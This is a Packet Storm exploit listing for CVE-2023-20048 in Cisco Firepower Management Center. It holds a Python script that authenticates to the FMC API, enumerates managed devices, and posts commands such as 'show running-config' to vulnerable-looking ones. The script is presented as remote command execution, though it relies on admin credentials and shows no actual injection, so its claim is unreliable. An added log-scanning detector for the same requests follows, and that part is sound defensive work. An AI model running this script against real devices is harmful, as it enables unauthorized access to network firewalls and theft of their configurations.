Cisco Firepower Management Center Remote Command Execution

13 Mar 2024 00:00:00 | Reported by Abdualhadi Khalifa | Type: packetstorm | Source: packetstormsecurity.com

Cisco Firepower Management Center Remote Command Execution, dated 12/06/2023. Versions: 6.2.3.18, 6.4.0.16, 6.6.7.1. CVE: CVE-2023-20048.

```python
# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
# CVE : [CVE-2023-20048]

import requests
import json

# set the variables for the URL, username, and password for the FMC web services interface
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers
# set the access token as the authorization header for the subsequent requests
try:
    if response.status_code == 200:
        access_token = response.headers["X-auth-access-token"]
        refresh_token = response.headers["X-auth-refresh-token"]
        session.headers["Authorization"] = access_token
    else:
        print("Failed to get tokens, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# set the variable for the domain id
# change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)

# check the response status and extract the data as a json object
try:
    if response.status_code == 200:
        data = response.json()
    else:
        print("Failed to get devices, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
    device_name = item["name"]
    device_url = item["links"]["self"]
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details
for device in devices:
    device_name, device_url = device
    response = session.get(device_url)

    # check the response status and extract the data as a json object
    try:
        if response.status_code == 200:
            data = response.json()
        else:
            print("Failed to get device details, status code: " + str(response.status_code))
            continue
    except Exception as e:
        print(e)
        continue

    # parse the data to get the device type, software version, and configuration URL
    device_type = data["type"]
    device_version = data["metadata"]["softwareVersion"]
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
    # use the values from the affected products section in the security advisory
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device
        commands = ["show version", "show running-config", "show interfaces"]
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
        for command in commands:
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
            response = session.post(command_url)

            # check the response status and extract the data as a json object
            try:
                if response.status_code == 200:
                    data = response.json()
                else:
                    print("Failed to execute command, status code: " + str(response.status_code))
                    continue
            except Exception as e:
                print(e)
                continue

            # parse the data to get the result of the command execution and print it
            result = data["result"]
            print("Command: " + command)
            print("Result: " + result)

    else:
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
```
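A defender-side companion to the script above, added here and not part of the original exploit or of any Cisco tooling: it scans web access logs for the request pattern the script produces, namely a POST to `/api/fmc_platform/v1/auth/generatetoken` followed by POSTs to a `.../devicerecords/{DEVICE_ID}/operational/command/{COMMAND}` path from the same client. The combined-log-style line format, the function name and the sample lines are constructed assumptions; adapt the regex to the actual FMC or reverse-proxy log format.

```python
import re
from urllib.parse import unquote
# Assumed log layout (combined-log style); real FMC or proxy logs may differ.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TOKEN_PATH = "/api/fmc_platform/v1/auth/generatetoken"
# Path shape taken from the script above: .../devicerecords/{DEVICE_ID}/operational/command/{COMMAND}
CMD_RE = re.compile(
    r"^/api/fmc_config/v1/domain/(?P<domain>[^/]+)/devices/devicerecords/"
    r"(?P<device>[^/]+)/operational/command/(?P<command>.+)$"
)

def find_command_requests(lines):
    """Return one finding per POST to the operational/command path."""
    token_clients = set()            # client IPs that requested an API token earlier
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                 # skip lines that do not fit the assumed format
        ip, method, path = m["ip"], m["method"], m["path"].split("?", 1)[0]
        if method == "POST" and path == TOKEN_PATH:
            token_clients.add(ip)
            continue
        c = CMD_RE.match(path)
        if method == "POST" and c:
            findings.append({
                "client": ip,
                "time": m["ts"],
                "device_id": c["device"],
                "command": unquote(c["command"]),   # decode %20 etc. for review
                "status": int(m["status"]),
                "token_request_seen": ip in token_clients,
            })
    return findings

# Constructed sample lines (not real traffic); DOMAIN-UUID and DEVICE-ID are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jun/2023:10:00:01 +0000] "POST /api/fmc_platform/v1/auth/generatetoken HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Jun/2023:10:00:02 +0000] "GET /api/fmc_config/v1/domain/DOMAIN-UUID/devices/devicerecords HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jun/2023:10:00:03 +0000] "POST /api/fmc_config/v1/domain/DOMAIN-UUID/devices/devicerecords/DEVICE-ID/operational/command/show%20version HTTP/1.1" 200 90',
    '203.0.113.9 - - [12/Jun/2023:10:05:00 +0000] "POST /api/fmc_config/v1/domain/DOMAIN-UUID/devices/devicerecords/DEVICE-ID/operational/command/show%20interfaces HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in find_command_requests(SAMPLE_LOG):
        print(finding)
```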
